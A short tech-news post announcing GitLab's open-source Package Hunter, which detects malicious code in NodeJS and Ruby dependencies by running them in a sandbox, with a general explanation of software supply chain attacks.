Jump to content
  • GitLab’s New Open Source Tool Will Detect Malicious Code

    aum

    • 652 views
    • 2 minutes
     Share


    • 652 views
    • 2 minutes

    GitLab’s New Open Source Tool Will Detect Malicious Code

     

    There are several open-source tools available for security researchers. Now, GitLab has introduced a new one to the arsenal that lets you detect malicious code in dependencies.

     

    The tool is also known as “Package Hunter” and is an important addition that could help secure every type of software.

     

    What is Package Hunter?

     

    Every software includes some form of dependencies, which makes it possible for a developer to quickly build an app.

     

    While this facilitates the reuse of code to achieve the task, they often just “trust” the dependencies used without separate review.

    Package Hunter comes to the rescue here and lets you easily detect malicious code in a dependency package.

     

    Enhanching Software Supply Chain Security

     

    Many supply chain attacks involve a compromised dependency package.

     

    Normally, the attacker injects malicious code in the dependency code available to the public or creates a separate private repository to distribute the malicious dependency that looks safe.

     

    Even if you are using a package manager to get trusted packages, it can be tricked to download packages from a private repository. And, you will have no idea about it.

     

    Hence, with an additional check to the supply chain which is as convenient as Package Hunter, the software supply chain security should improve.

     

    And, especially, if the open-source supply chain security improves, open source software security will gradually get a boost as well.

     

    How Does it Work? How Can You Get it?


    Package Hunter scans for malicious code and keeps an eye on unexpected behavior of the dependencies.

     

    It installs the dependencies in a sandbox environment to monitor and detect any anomalies.

     

    As of now, it supports testing NodeJS modules and Ruby Jems.

     

    GitLab has been using the tool internally for a while. And, now, it seamlessly integrates with GitLab.

     

    You can learn more about setting it up by referring to the official documentation and the Package Hunter CLI instructions.

     

    It is available as a free and open-source project on GitLab.

     

    Source


    User Feedback

    Recommended Comments

    There are no comments to display.



    Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Add a comment...

    ×   Pasted as rich text.   Paste as plain text instead

      Only 75 emoji are allowed.

    ×   Your link has been automatically embedded.   Display as a link instead

    ×   Your previous content has been restored.   Clear editor

    ×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...